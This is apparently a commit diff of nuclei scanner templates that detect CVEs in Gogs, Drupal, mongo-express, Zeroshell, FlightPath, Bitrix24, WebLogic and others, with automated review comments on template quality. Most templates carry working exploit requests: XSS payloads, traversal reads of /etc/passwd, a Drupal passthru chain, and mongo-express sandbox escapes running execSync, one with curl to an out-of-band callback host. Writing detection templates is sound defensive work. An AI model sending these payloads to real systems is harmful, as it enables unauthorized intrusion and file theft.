- https://nvd.nist.gov/vuln/detail/CVE-2018-13380
|
||||
- https://blog.orange.tw/2019/08/attacking-ssl-vpn-part-2-breaking-the-fortigate-ssl-vpn.html
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.10
|
||||
cve-id: CVE-2018-13380
|
||||
cwe-id: CWE-79
|
||||
tags: cve,cve2018,fortios,xss,fortinet
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/message?title=x&msg=%26%23%3Csvg/onload=alert(1337)%3E"
|
||||
- "{{BaseURL}}/message?title=x&msg=%26%23%3Csvg/onload=alert(1337)%3E%3B"
|
||||
- "{{BaseURL}}/remote/error?errmsg=ABABAB--%3E%3Cscript%3Ealert(1337)%3C/script%3E"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "<svg/onload=alert(1337)>"
|
||||
part: body
|
||||
- "<script>alert(1337)</script>"
|
||||
condition: or
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- "application/json"
|
||||
part: header
|
||||
negative: true
|
||||
|
||||
- type: status
|
||||
|
|
|
@ -1,9 +1,10 @@
|
|||
id: CVE-2018-17254
|
||||
|
||||
info:
|
||||
name: Joomla JCK Editor SQL Injection
|
||||
name: Joomla! JCK Editor SQL Injection
|
||||
author: Suman_Kar
|
||||
description: The JCK Editor component 6.4.4 for Joomla! allows SQL Injection via the jtreelink/dialogs/links.php parent parameter.
|
||||
remediation: Update or remove the affected plugin.
|
||||
severity: critical
|
||||
tags: joomla,sqli,cve,cve2018
|
||||
reference:
|
||||
|
@ -27,3 +28,5 @@ requests:
|
|||
part: body
|
||||
words:
|
||||
- "nuclei-template"
|
||||
|
||||
# Enhanced by mp on 2022/02/08
|
||||
|
|
|
@ -0,0 +1,35 @@
|
|||
id: CVE-2018-18925
|
||||
info:
|
||||
name: Gogs - Remote Code Execution (CVE-2018-18925)
|
||||
author: princechaddha
|
||||
severity: critical
|
||||
description: Gogs 0.11.66 allows remote code execution because it does not properly validate session IDs, as demonstrated by a ".." session-file forgery in the file session provider in file.go. This is related to session ID handling in the go-macaron/session code for Macaron.
|
||||
reference:
|
||||
- https://www.anquanke.com/post/id/163575
|
||||
- https://github.com/vulhub/vulhub/tree/master/gogs/CVE-2018-18925
|
||||
- https://nvd.nist.gov/vuln/detail/cve-2018-18925
|
||||
remediation: This issue will be fixed by updating to the latest version of Gogs
|
||||
tags: cve,cve2018,gogs,lfi,rce
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.80
|
||||
cve-id: CVE-2018-18925
|
||||
cwe-id: CWE-384
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
GET / HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Cookie: lang=en-US; i_like_gogits=../../../../etc/passwd;
|
||||
|
||||
- |
|
||||
GET / HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Cookie: lang=en-US; i_like_gogits=../../../../etc/dummy;
|
||||
|
||||
req-condition: true
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'status_code_1 == 500 && status_code_2 == 200 && contains(body_2, "<meta name=\"author\" content=\"Gogs\" />")'
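Review bot: The differential in the DSL proves less than it appears to: a 500 on the traversal cookie and a 200 on `../../../../etc/dummy` would also be produced by a server that fails on any malformed session value, and only the Gogs meta tag is positively confirmed. A tighter check adds a third request with a same-length non-traversal session id (for example `i_like_gogits=aaaaaaaaaaaaaaaaaaaaaaaa;`) and extends the condition with `&& status_code_3 == 200`, so the 500 is attributable to the traversal itself; whether a patched Gogs returns 200 or something else for that control is not visible here and should be verified against the vulhub environment in the references.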
|
|
@ -0,0 +1,74 @@
|
|||
id: CVE-2018-7602
|
||||
info:
|
||||
name: Drupal Remote Code Execution Vulnerability
|
||||
author: princechaddha
|
||||
severity: critical
|
||||
description: A remote code execution vulnerability exists within multiple subsystems of Drupal 7.x and 8.x. This potentially allows attackers to exploit multiple attack vectors on a Drupal site, which could result in the site being compromised. This vulnerability is related to Drupal core - Highly critical - Remote Code Execution - SA-CORE-2018-002. Both SA-CORE-2018-002 and this vulnerability are being exploited in the wild.
|
||||
reference:
|
||||
- https://github.com/vulhub/vulhub/blob/master/drupal/CVE-2018-7602/drupa7-CVE-2018-7602.py
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2018-7602
|
||||
tags: cve,cve2018,drupal,authenticated
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.80
|
||||
cve-id: CVE-2018-7602
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /?q=user%2Flogin HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
form_id=user_login&name={{username}}&pass={{password}}&op=Log+in
|
||||
|
||||
- |
|
||||
GET /?q={{url_encode("{{userid}}")}}%2Fcancel HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
- |
|
||||
POST /?q={{url_encode("{{userid}}")}}%2Fcancel&destination={{url_encode("{{userid}}")}}%2Fcancel%3Fq%5B%2523post_render%5D%5B%5D%3Dpassthru%26q%5B%2523type%5D%3Dmarkup%26q%5B%2523markup%5D%3Decho+COP-2067-8102-EVC+|+rev HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
form_id=user_cancel_confirm_form&form_token={{form_token}}&_triggering_element_name=form_id&op=Cancel+account
|
||||
|
||||
- |
|
||||
POST /?q=file%2Fajax%2Factions%2Fcancel%2F%23options%2Fpath%2F{{form_build_id}} HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
form_build_id={{form_build_id}}
|
||||
|
||||
cookie-reuse: true
|
||||
redirects: true
|
||||
max-redirects: 2
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- 'CVE-2018-7602-POC'
|
||||
|
||||
extractors:
|
||||
- type: regex
|
||||
part: body
|
||||
name: userid
|
||||
internal: true
|
||||
group: 1
|
||||
regex:
|
||||
- '<meta about="([/a-z0-9]+)" property="foaf'
|
||||
|
||||
- type: regex
|
||||
part: body
|
||||
name: form_token
|
||||
internal: true
|
||||
group: 1
|
||||
regex:
|
||||
- '<input type="hidden" name="form_token" value="(.*)" />'
|
||||
|
||||
- type: regex
|
||||
part: body
|
||||
name: form_build_id
|
||||
internal: true
|
||||
group: 1
|
||||
regex:
|
||||
- '<input type="hidden" name="form_build_id" value="(.*)" />'
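Review bot: The two hidden-input extractors use greedy captures, `value="(.*)" />`, which over-capture whenever another attribute or input follows on the same line and then feed a corrupted `{{form_token}}` / `{{form_build_id}}` into requests 3 and 4. Use `value="([^"]+)"` in both regexes. The tags also omit `rce` although the name and `severity: critical` describe one — `tags: cve,cve2018,drupal,rce,authenticated` — and the classification lacks a `cwe-id`, unlike the sibling templates in this commit.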
|
|
@ -0,0 +1,32 @@
|
|||
id: CVE-2019-10758
|
||||
info:
|
||||
name: Mongo-Express Remote Code Execution - CVE-2019-10758
|
||||
author: princechaddha
|
||||
severity: critical
|
||||
description: mongo-express before 0.54.0 is vulnerable to Remote Code Execution via endpoints that uses the `toBSON` method. A misuse of the `vm` dependency to perform `exec` commands in a non-safe environment.
|
||||
reference:
|
||||
- https://github.com/vulhub/vulhub/tree/master/mongo-express/CVE-2019-10758
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2019-10758
|
||||
remediation: This issue will be fixed by updating to the latest version of mongo-express
|
||||
metadata:
|
||||
shodan-query: http.title:"Mongo Express"
|
||||
tags: cve,cve2019,mongo,mongo-express
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
|
||||
cvss-score: 9.90
|
||||
cve-id: CVE-2019-10758
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /checkValid HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Authorization: Basic YWRtaW46cGFzcw==
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
document=this.constructor.constructor("return process")().mainModule.require("child_process").execSync("curl http://{{interactsh-url}}")
|
||||
matchers:
|
||||
- type: word
|
||||
part: interactsh_protocol # Confirms the HTTP Interaction
|
||||
words:
|
||||
- "http"
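Review bot: The request hard-codes `Authorization: Basic YWRtaW46cGFzcw==` (`admin:pass`, the mongo-express default), so the template only fires against default-credential deployments and silently reports nothing on any other authenticated instance, despite the `PR:L` vector in the classification. Make the credentials template variables with those values as defaults, e.g. `Authorization: Basic {{base64(username + ':' + password)}}`, and say in the description that default credentials are assumed. The payload also depends on `curl` existing on the target; an interaction that needs no binary, or at least accepting `dns` alongside `http` in the interactsh matcher, would be more robust.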
|
|
@ -4,12 +4,10 @@ info:
|
|||
name: Zeroshell 3.9.0 Remote Command Execution
|
||||
author: dwisiswant0
|
||||
severity: critical
|
||||
description: |
|
||||
This template exploits an unauthenticated command injection vulnerability
|
||||
found in ZeroShell 3.9.0 in the "/cgi-bin/kerbynet" url.
|
||||
As sudo is configured to execute /bin/tar without a password (NOPASSWD)
|
||||
it is possible to run root commands using the "checkpoint" tar options.
|
||||
description: Zeroshell 3.9.0 is prone to a remote command execution vulnerability. Specifically, this issue occurs because the web application mishandles a few HTTP parameters. An unauthenticated attacker can exploit this issue by injecting OS commands inside the vulnerable parameters.
|
||||
remediation: Upgrade to 3.9.5. Be aware this product is no longer supported.
|
||||
reference:
|
||||
- https://www.zeroshell.org/new-release-and-critical-vulnerability/
|
||||
- https://www.tarlogic.com/advisories/zeroshell-rce-root.txt
|
||||
- https://github.com/X-C3LL/PoC-CVEs/blob/master/CVE-2019-12725/ZeroShell-RCE-EoP.py
|
||||
tags: cve,cve2019,rce,zeroshell
|
||||
|
@ -30,4 +28,6 @@ requests:
|
|||
- 200
|
||||
- type: regex
|
||||
regex:
|
||||
- "((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)"
|
||||
- "((u|g)id|groups)=[0-9]{1,4}[a-z0-9]+"
|
||||
|
||||
# Enhanced by mp on 2022/02/04
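Review bot: The new regex `((u|g)id|groups)=[0-9]{1,4}[a-z0-9]+` no longer matches standard `id` output such as `uid=0(root)`: after the digits it demands another `[a-z0-9]` character, but the next character there is `(`, so the root case (`uid=0`) is exactly what it misses, and a two-digit uid only matches because `1` then `0` satisfy both classes. If the parentheses were dropped because some targets strip them from the response, make them optional rather than removing them: `- "((u|g)id|groups)=[0-9]{1,4}\\(?[a-z0-9]+\\)?"`. Whether the target really strips parentheses is not visible here; please confirm against a live response before merging.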
|
||||
|
|
|
@ -0,0 +1,49 @@
|
|||
id: CVE-2019-13396
|
||||
info:
|
||||
name: FlightPath Local File Inclusion
|
||||
author: 0x_Akoko,daffainfo
|
||||
severity: high
|
||||
description: FlightPath versions prior to 4.8.2 and 5.0-rc2 suffer from a local file inclusion vulnerability.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/47121
|
||||
- https://www.cvedetails.com/cve/CVE-2019-13396/
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2019-13396
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
|
||||
cvss-score: 5.3
|
||||
cve-id: CVE-2019-13396
|
||||
cwe-id: CWE-22
|
||||
tags: cve,cve2019,flightpath,lfi
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
GET /login HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
- |
|
||||
POST /flightpath/index.php?q=system-handle-form-submit HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Accept: application/json, text/plain, */*
|
||||
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
|
||||
|
||||
callback=system_login_form&form_token={{token}}&form_include=../../../../../../../../../etc/passwd
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0:"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
extractors:
|
||||
- type: regex
|
||||
name: token
|
||||
part: body
|
||||
group: 1
|
||||
internal: true
|
||||
regex:
|
||||
- "idden' name='form_token' value='([a-z0-9]+)'>"
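Review bot: `severity: high` contradicts the classification two lines down, `cvss-score: 5.3` with a `C:L/I:N/A:N` vector, which is medium; pick one (an unauthenticated read of /etc/passwd is usually rated high, in which case the vector and score should change, not the severity). The two requests also use different base paths — `GET /login` to harvest the token, then `POST /flightpath/index.php?q=system-handle-form-submit` — so on a target where one is right the other likely 404s and `{{token}}` ends up empty; check the install layout in exploit-db 47121 and use the same prefix in both requests.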
|
|
@ -1,11 +1,12 @@
|
|||
id: CVE-2019-13462
|
||||
|
||||
info:
|
||||
name: Lansweeper through 7.1.115.4 unauthenticated SQL injection
|
||||
name: Lansweeper Unauthenticated SQL Injection
|
||||
author: divya_mudgal
|
||||
severity: critical
|
||||
reference: https://www.nccgroup.com/ae/our-research/technical-advisory-unauthenticated-sql-injection-in-lansweeper/
|
||||
description: Lansweeper web application through 7.1.115.4 allows unauthenticated SQL injection via the "row" and "column" GET parameters to /WidgetHandler.ashx?MethodName=Sort&ID=1&column=INJECTION&row=INJECTION URI.
|
||||
description: Lansweeper before 7.1.117.4 allows unauthenticated SQL injection.
|
||||
remediation: Upgrade to the latest version.
|
||||
tags: cve,cve2019,sqli,lansweeper
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
|
||||
|
@ -34,3 +35,5 @@ requests:
|
|||
- type: status
|
||||
status:
|
||||
- 500
|
||||
|
||||
# Enhanced by mp on 2022/02/04
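Review bot: The rewritten description drops the concrete detail the old one had — the injectable `row` and `column` GET parameters of `/WidgetHandler.ashx?MethodName=Sort` — and changes the version claim from `through 7.1.115.4` to `before 7.1.117.4`; both cannot be right, and the new wording leaves a reader nothing to verify the request against. Suggest `description: Lansweeper before 7.1.117.4 allows unauthenticated SQL injection via the "row" and "column" GET parameters of /WidgetHandler.ashx?MethodName=Sort.` after confirming the fixed version from the NCC advisory in the reference. The request and matchers lie between the two hunks, outside this view.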
|
||||
|
|
|
@ -31,3 +31,4 @@ requests:
|
|||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- 500
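Review bot: Accepting `- 500` here widens the status matcher so that a generic server error page passes it along with a 200; whether that is safe depends on the sibling body matchers of this file, which are outside the hunk. If a 500 is the expected symptom on vulnerable versions, document it above the list, e.g. `# 500: vulnerable versions error out on the injected value`, so the intent survives later cleanups.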
|
||||
|
|
|
@ -0,0 +1,31 @@
|
|||
id: CVE-2020-12447
|
||||
info:
|
||||
name: Onkyo TX-NR585 Web Interface - Directory Traversal
|
||||
author: 0x_Akoko
|
||||
severity: high
|
||||
description: A Local File Inclusion (LFI) issue on Onkyo TX-NR585 1000-0000-000-0008-0000 devices allows remote unauthenticated users on the network to read sensitive files via %2e%2e%2f directory traversal
|
||||
reference:
|
||||
- https://blog.spookysec.net/onkyo-lfi
|
||||
- https://www.cvedetails.com/cve/CVE-2020-12447
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
||||
cvss-score: 7.5
|
||||
cve-id: CVE-2020-12447
|
||||
cwe-id: CWE-22
|
||||
tags: cve,cve2020,onkyo,lfi,traversal
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:[x*]:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -2,34 +2,40 @@ id: CVE-2020-13483
|
|||
|
||||
info:
|
||||
name: Bitrix24 through 20.0.0 allows XSS
|
||||
author: pikpikcu
|
||||
author: pikpikcu,3th1c_yuk1
|
||||
severity: medium
|
||||
reference: https://gist.github.com/mariuszpoplwski/ca6258cf00c723184ebd2228ba81f558
|
||||
description: The Web Application Firewall in Bitrix24 through 20.0.0 allows XSS via the items[ITEMS][ID] parameter to the components/bitrix/mobileapp.list/ajax.php/ URI.
|
||||
tags: cve,cve2020,xss,bitrix
|
||||
reference:
|
||||
- https://gist.github.com/mariuszpoplwski/ca6258cf00c723184ebd2228ba81f558
|
||||
- https://twitter.com/brutelogic/status/1483073170827628547
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.10
|
||||
cve-id: CVE-2020-13483
|
||||
cwe-id: CWE-79
|
||||
tags: cve,cve2020,xss,bitrix
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/bitrix/components/bitrix/mobileapp.list/ajax.php/?=&AJAX_CALL=Y&items%5BITEMS%5D%5BBOTTOM%5D%5BLEFT%5D=&items%5BITEMS%5D%5BTOGGLABLE%5D=test123&=&items%5BITEMS%5D%5BID%5D=<a+href="/*">*/%29%7D%29;function+__MobileAppList()%7Balert(1)%7D//>'
|
||||
- '{{BaseURL}}/bitrix/components/bitrix/mobileapp.list/ajax.php/?=&AJAX_CALL=Y&items%5BITEMS%5D%5BBOTTOM%5D%5BLEFT%5D=&items%5BITEMS%5D%5BTOGGLABLE%5D=test123&=&items%5BITEMS%5D%5BID%5D=%3Cimg+src=%22//%0d%0a)%3B//%22%22%3E%3Cdiv%3Ex%0d%0a%7D)%3Bvar+BX+=+window.BX%3Bwindow.BX+=+function(node,+bCache)%7B%7D%3BBX.ready+=+function(handler)%7B%7D%3Bfunction+__MobileAppList(test)%7Balert(document.domain)%3B%7D%3B//%3C/div%3E'
|
||||
|
||||
stop-at-first-match: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- "function(handler){};function __MobileAppList(test){alert(document.domain);};//</div>"
|
||||
part: body
|
||||
words:
|
||||
- '<a href="/*">*/)});function __MobileAppList(){alert(1)}//'
|
||||
- "function(handler){};function __MobileAppList(test){alert(document.domain);};//</div>"
|
||||
condition: or
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- text/html
|
||||
part: header
|
||||
|
||||
- type: status
|
||||
status:
|
||||
|
|
|
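Review bot: `cvss-score: 6.10` is a plain YAML float, so it loads as 6.1 and the trailing zero is dropped before nuclei sees it; write `cvss-score: 6.1` to match the stored value (CVE-2021-24300 in this same commit already uses `6.1`). The same applies to CVE-2020-18268, CVE-2020-36365 and CVE-2021-20792 (`6.10`), CVE-2021-20150 and CVE-2021-21973 (`5.30`), CVE-2021-20038 and CVE-2021-20158 (`9.80`) and CVE-2021-22205 (`9.90`) elsewhere in this commit. Separately, the restructured body matcher (`- type: word` with `condition: or`) requires the injected payload to be reflected byte-for-byte; any output encoding of `<` or `"` by the target defeats it, which is acceptable for a reflected-XSS check but deserves a comment such as `# requires exact reflection of the payload; encoded output is treated as not vulnerable`.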
@ -6,17 +6,12 @@ info:
|
|||
severity: critical
|
||||
reference:
|
||||
- https://testbnull.medium.com/weblogic-rce-by-only-one-get-request-cve-2020-14882-analysis-6e4b09981dbf
|
||||
- https://www.oracle.com/security-alerts/cpuoct2020.html
|
||||
- https://twitter.com/jas502n/status/1321416053050667009
|
||||
- https://youtu.be/JFVDOIL0YtA
|
||||
- https://github.com/jas502n/CVE-2020-14882#eg
|
||||
description: |
|
||||
Vulnerability in the Oracle WebLogic Server
|
||||
product of Oracle Fusion Middleware (component: Console).
|
||||
Supported versions that are affected are 10.3.6.0.0,
|
||||
12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0.
|
||||
Easily exploitable vulnerability allows unauthenticated
|
||||
attacker with network access via HTTP to compromise the server.
|
||||
Successful attacks of this vulnerability can result in takeover.
|
||||
description: An easily exploitable vulnerability allows unauthenticated attackers with network access via HTTP to compromise Oracle WebLogic Server.
|
||||
remediation: Apply the appropriate security update.
|
||||
tags: cve,cve2020,oracle,rce,weblogic,oast
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
|
@ -44,3 +39,4 @@ requests:
|
|||
part: interactsh_protocol
|
||||
words:
|
||||
- "http"
|
||||
# Enhanced by mp on 2022/02/08
|
||||
|
|
|
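Review bot: The one-line `description:` that replaces the block scalar drops the affected-version list (10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0) and the affected component (Console) that the old text carried, and that is exactly what an operator triaging a hit needs. Suggest `description: Oracle WebLogic Server (Fusion Middleware, Console component) versions 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0 contain an easily exploitable vulnerability that allows an unauthenticated attacker with network access via HTTP to compromise the server.` The new `remediation: Apply the appropriate security update.` could name the Oracle CPU already listed under `reference` so the reader knows which update is meant.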
@ -0,0 +1,38 @@
|
|||
id: CVE-2020-18268
|
||||
|
||||
info:
|
||||
name: Z-BlogPHP 1.5.2 Open redirect
|
||||
author: 0x_Akoko
|
||||
severity: medium
|
||||
description: Open Redirect in Z-BlogPHP v1.5.2 and earlier allows remote attackers to obtain sensitive information via the "redirect" parameter in the component "zb_system/cmd.php."
|
||||
reference:
|
||||
- https://github.com/zblogcn/zblogphp/issues/216
|
||||
- https://www.cvedetails.com/cve/CVE-2020-18268
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.10
|
||||
cve-id: CVE-2020-18268
|
||||
cwe-id: CWE-601
|
||||
tags: cve,cve2020,redirect,zblogphp,authenticated
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /zb_system/cmd.php?act=verify HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Length: 81
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Connection: close
|
||||
|
||||
btnPost=Log+In&username={{username}}&password={{md5("{{password}}")}}&savedate=0
|
||||
|
||||
- |
|
||||
GET /zb_system/cmd.php?atc=login&redirect=http://www.example.com HTTP/2
|
||||
Host: {{Hostname}}
|
||||
|
||||
cookie-reuse: true
|
||||
matchers:
|
||||
- type: regex
|
||||
part: header
|
||||
regex:
|
||||
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
|
|
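Review bot: The second raw request's request line ends in `HTTP/2` while the first request and every other raw template in this commit use `HTTP/1.1`; nuclei's raw request handling is built around HTTP/1.1 text, so this looks like a typo and should read `GET /zb_system/cmd.php?atc=login&redirect=http://www.example.com HTTP/1.1`. The hard-coded `Content-Length: 81` in the first request cannot be correct for every `{{username}}` value; nuclei normally recomputes the length for raw requests, so the header is at best misleading and at worst wrong if the template is ever run with unsafe raw mode, and dropping it is the safer choice. `tags` carries `authenticated`, which matches the login step, but the `name` does not say so; `name: Z-BlogPHP 1.5.2 - Authenticated Open Redirect` would make the precondition visible in listings.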
@ -0,0 +1,35 @@
|
|||
id: CVE-2020-23575
|
||||
|
||||
info:
|
||||
name: Kyocera Printer d-COPIA253MF - Directory Traversal
|
||||
author: 0x_Akoko
|
||||
severity: high
|
||||
description: A directory traversal vulnerability exists in Kyocera Printer d-COPIA253MF plus. Successful exploitation of this vulnerability could allow an attacker to retrieve or view arbitrary files from the affected server.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/48561
|
||||
- https://www.cvedetails.com/cve/CVE-2020-23575
|
||||
- https://www.kyoceradocumentsolutions.com.tr/tr.html
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
||||
cvss-score: 7.5
|
||||
cve-id: CVE-2020-23575
|
||||
cwe-id: CWE-22
|
||||
tags: cve,cve2020,printer,iot,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/wlmeng/../../../../../../../../../../../etc/passwd%00index.htm"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "root:.*:0:0"
|
||||
- "bin:.*:1:1"
|
||||
condition: or
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
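Review bot: The body matcher is `type: word`, but its entries `root:.*:0:0` and `bin:.*:1:1` are regular expressions; a word matcher compares literal substrings, so it only fires on a response that literally contains the text `root:.*:0:0`, and a real passwd line such as `root:x:0:0` never matches. Change the two lines to `- type: regex` and `regex:` (keeping `part: body` and `condition: or`), as CVE-2020-12447 in this commit does with its `root:[x*]:0:0` regex matcher. As written the template cannot produce a true positive, so this should block the merge of this file.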
@ -4,7 +4,7 @@ info:
|
|||
name: Unauthenticated File upload wpDiscuz WordPress plugin RCE
|
||||
author: Ganofins
|
||||
severity: critical
|
||||
description: WordPress wpDiscuz plugin version 7.0.4. This flaw gave unauthenticated attackers the ability to upload arbitrary files, including PHP files, and achieve remote code execution on a vulnerable site’s server.
|
||||
description: WordPress wpDiscuz plugin version 7.0.4. This flaw gave unauthenticated attackers the ability to upload arbitrary files, including PHP files, and achieve remote code execution on a vulnerable site's server.
|
||||
reference: https://github.com/suncsr/wpDiscuz_unauthenticated_arbitrary_file_upload/blob/main/README.md
|
||||
tags: cve,cve2020,wordpress,wp-plugin,rce,upload
|
||||
classification:
|
||||
|
|
|
@ -0,0 +1,51 @@
|
|||
id: CVE-2020-24391
|
||||
|
||||
info:
|
||||
name: Mongo Express Remote Code Execution
|
||||
author: leovalcante
|
||||
severity: critical
|
||||
description: Mongo-express uses safer-eval to validate user supplied javascript. Unfortunately safer-eval sandboxing capabilities are easily bypassed leading to RCE in the context of the node server.
|
||||
reference:
|
||||
- https://securitylab.github.com/advisories/GHSL-2020-131-mongo-express/
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2020-24391
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.8
|
||||
cve-id: CVE-2020-24391
|
||||
tags: cve,cve2020,mongo,express,rce,intrusive
|
||||
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
GET / HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
- |
|
||||
POST /checkValid HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
document=++++++++++++%28%28%29+%3D%3E+%7B%0A++++++++const+process+%3D+clearImmediate.constructor%28%22return+process%3B%22%29%28%29%3B%0A++++++++const+result+%3D+process.mainModule.require%28%22child_process%22%29.execSync%28%22id+%3E+build%2Fcss%2F{{randstr}}.css%22%29%3B%0A++++++++console.log%28%22Result%3A+%22+%2B+result%29%3B%0A++++++++return+true%3B%0A++++%7D%29%28%29++++++++
|
||||
|
||||
- |
|
||||
GET /public/css/{{randstr}}.css HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
req-condition: true
|
||||
cookie-reuse: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: regex
|
||||
part: body_3
|
||||
regex:
|
||||
- "((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
extractors:
|
||||
- type: regex
|
||||
regex:
|
||||
- "((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)"
|
|
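Review bot: The `description` does not say that the check works by making the target write a file under `build/css/` and then fetching it from `/public/css/`, and that the template never removes it; the `intrusive` tag signals this only indirectly, and an operator should be told that a positive result leaves a `{{randstr}}.css` artifact on the host. The `classification` block also has no `cwe-id`, unlike every other new template in this commit (CWE-22, CWE-79, CWE-601, CWE-787, CWE-918 are all filled in); the NVD entry already listed under `reference` is the place to take it from. The identical regex in `matchers` and `extractors` could carry one shared comment, e.g. `# uid/gid line from the command output; the extractor surfaces it in the result`.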
@ -29,9 +29,9 @@ requests:
|
|||
- "Contact Form 7"
|
||||
part: body
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- '^== Changelog =="'
|
||||
- type: word
|
||||
words:
|
||||
- '== Changelog =='
|
||||
part: body
|
||||
|
||||
- type: regex
|
||||
|
|
|
@ -0,0 +1,40 @@
|
|||
id: CVE-2020-35749
|
||||
|
||||
info:
|
||||
name: Simple Job Board < 2.9.4 - Authenticated Path Traversal Leading to Arbitrary File Download
|
||||
author: cckuailong
|
||||
severity: high
|
||||
description: The plugin does not validate the sjb_file parameter when viewing a resume, allowing authenticated user with the download_resume capability (such as HR users) to download arbitrary files from the web-server via a path traversal attack.
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/eed3bd69-2faf-4bc9-915c-c36211ef9e2d
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2020-35749
|
||||
classification:
|
||||
